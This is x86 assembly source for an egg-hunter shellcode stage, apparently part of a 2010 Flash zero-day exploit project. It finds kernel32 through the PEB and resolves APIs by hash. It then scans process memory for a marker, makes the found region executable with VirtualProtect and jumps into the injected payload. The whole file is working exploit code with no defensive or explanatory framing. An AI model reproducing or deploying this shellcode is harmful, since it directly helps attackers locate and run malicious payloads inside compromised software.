src/flash0day/egghunt.asm
; egghunt Stage exec
; (c) 2010, cod@inbox.com
.586
.model flat, stdcall
option casemap :none ; case sensitive
PAGE_EXECUTE_READWRITE equ 40h
.code
ASSUME FS:nothing
start:
push ebp
mov ebp, esp
sub esp, 40h
db 0e8h
dd 0ffffffffh
db 0c8h
bob:
pop eax
sub eax, $ - 1 - OFFSET start
mov ebp, esp
sub esp, 40h
call get_kernel32
mov dword ptr [ebp+8], eax ; Kernel32
mov esi, eax
push 06e824142h
push esi
call get_procaddr
mov dword ptr [ebp-28h], eax
push 07946c61bh
push esi
call get_procaddr
mov dword ptr [ebp-24h], eax
push 0a3c8c8aah
push esi
call get_procaddr
mov dword ptr [ebp-2ch], eax
push 060e0ceefh
push esi
call get_procaddr
mov dword ptr [ebp-30h], eax
jmp egghuntcore
ExitThread:
jmp dword ptr [ebp-30h]
IsBadReadPtr:
jmp dword ptr [ebp-28h]
VirtualProtect:
jmp dword ptr [ebp-24h]
VirtualQuery:
jmp dword ptr [ebp-2ch]
@error:
; main core of "EGG-HUNT"
dd 0cccccccch
egghuntcore:
xor ebx, ebx ; ecx contain original address
@scanaddr:
cmp ebx, 7fff0000h
JAE @error
@scan:
; ebx is a valid block
lea eax, [ebp-20h]
push 1ch
push eax
push ebx
call VirtualQuery ; get address of information
cmp dword ptr [ebp-10h], 1000h ; MEM_COMMIT
jne @continue
bt dword ptr [ebp-0ch], 8h ; AND
jb @continue ; page guard
bt dword ptr [ebp-0ch], 0h ; AND
jb @continue ; NO_ACCESS
mov edi, dword ptr [ebp-20h]
mov ebx, dword ptr [ebp-14h] ; look!
jmp @find
test eax, eax
jnz @found
; smandruppa
@continue:
mov ebx, dword ptr [ebp-20h] ; base address from AllocationBase
add ebx, dword ptr [ebp-14h] ; RegionSize
jmp @scanaddr ; move on next address
@find:
cld
mov ecx, ebx
shr ecx, 2
@next:
mov eax, 000000e8h
repne scasd
jnz @continue
cmp dword ptr [edi], 00255800h
je @found
test ecx, ecx
jz @continue
jmp @next
@found:
mov eax, edi
push eax
lea eax, [ebp-4h]
push eax
push PAGE_EXECUTE_READWRITE
push 2000h
mov eax, edi
and eax, 0fffff000h
sub eax, 1000h
push eax
call VirtualProtect ; virtual protect!
pop eax
sub eax, 4
push 0 ; null ptr to getprocaddr
push dword ptr [ebp+8] ; kernel32
; db 0cch
call eax
push 0
call ExitThread
; looks in module_list L"KERNEL32"
get_kernel32 proc
xor ecx, ecx
mov esi, fs:[ecx+30h]
mov esi, [esi+0ch]
mov esi, [esi+1ch]
@loop:
mov ebx, [esi+08h]
mov edi, [esi+20h]
mov esi, [esi]
cmp [edi+18h], cx
jnz @loop
mov eax, ebx
retn
get_kernel32 endp
; get proc address
; ebp+08 -> module
; ebp+0ch -> function
get_procaddr proc
push ebp
mov ebp, esp
push esi
push edi
push ecx
push ebx
push edx
mov edi, dword ptr [ebp+08h] ; load base address
mov eax, dword ptr [edi+3Ch] ; pe ptr
mov edx, dword ptr [edi+eax+78h] ; export
add edx, edi
mov ecx, dword ptr [edx+18h] ; counter EXPORT!
mov ebx, dword ptr [edx+20h] ; name EXPORT
add ebx, edi
@nextentry:
jecxz short @end
dec ecx
mov esi, [ebx+ecx*4]
add esi, dword ptr [ebp+08h]
xor edi, edi
xor eax, eax
cld
@ror:
lodsb
test al, al
jz short loc_117
ror edi, 0Dh
add edi, eax
jmp short @ror
loc_117:
cmp edi, dword ptr [ebp+0ch] ; same dword?
jnz short @nextentry
mov ebx, dword ptr [edx+24h]
add ebx, dword ptr [ebp+08h]
mov cx, word ptr [ebx+ecx*2]
mov ebx, dword ptr [edx+1Ch]
add ebx, dword ptr [ebp+08h]
mov eax, dword ptr [ebx+ecx*4]
add eax, dword ptr [ebp+08h]
@end:
pop edx
pop ebx
pop ecx
pop edi
pop esi
mov esp, ebp
pop ebp
ret 8
get_procaddr endp
WinMainCRTStartup PROC
jmp start
WinMainCRTStartup ENDP
end start